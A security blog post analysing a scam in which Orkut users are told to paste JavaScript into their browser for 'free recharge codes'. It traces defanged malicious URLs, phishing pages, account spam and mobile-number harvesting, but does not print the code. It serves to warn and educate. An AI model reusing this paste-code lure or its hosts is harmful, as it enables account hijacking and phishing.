Here’s a curious scam putting users of Google’s Orkut in the crosshairs. There’s a number of sites out there claiming a “free recharge code” (presumably they mean call credits) will be posted to your Orkut scrapbook, but only if you take some random Javascript code – oh dear – and paste it into your browser.
We’ve seen that particular wheeze before, but let’s see what they’re doing with it here. This is one of the sites in question:
Click to Enlarge
Shall we take a look at the Javascript?
You may be able to see the URL already. Let’s clean it up a little bit:
Click to Enlarge
Can you see it yet? “Snurl(dot)com/fr33ee”.
That triggers a big page of javascript code located at orkutaddict(dot)net/freerecharge/dpd(dot)js. At this point, the path branches off depending on whether you’re logged into Orkut or not. If you’re not, you’ll see this popup:
Click to Enlarge
“We are done now, login to Orkut and you’ll have your free recharge in just 24 hours”.
You’re then dumped at the following page, located at freerecharge(dot)orkutaddict(dot)net:
Click to Enlarge
“Sign in to OrkutPorn with your Google Account”.
Yeah, right.
Now we’ll see what happens if the victim posts the javascript into their browser while logged into Orkut. First you’re asked for your mobile number:
Then you’re given a collection of popup boxes promising you wonderful “recharge codes”.
After all of that, you’re dumped at a site flagged as a Phish:
Click to Enlarge
Worse, your Orkut account has started to spam out messages galore:
Here’s another one:
Even better(!), they’ve automatically signed you up to a collection of groups.
While Orkut Codes and Orkut Tools look legit, the middle group with 1,811 “members” is clearly related to this particular shenanigan. As you’ve probably guessed, all of the spamlinks on the profiles and in the group take you to more sites asking victims to cut and paste Javascript into their browser – many of which give you rather cheeky popups like this one begging for free advert clicks:
In conclusion, then, we have a whole bunch of dodgy Javascript, phish pages, advert clicking, spammed messages on profiles and popup boxes asking for mobile phone numbers.
Is this the concluding part of the writeup where I advise you to avoid the above at all costs?
You better believe it.
Christopher Boyd
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment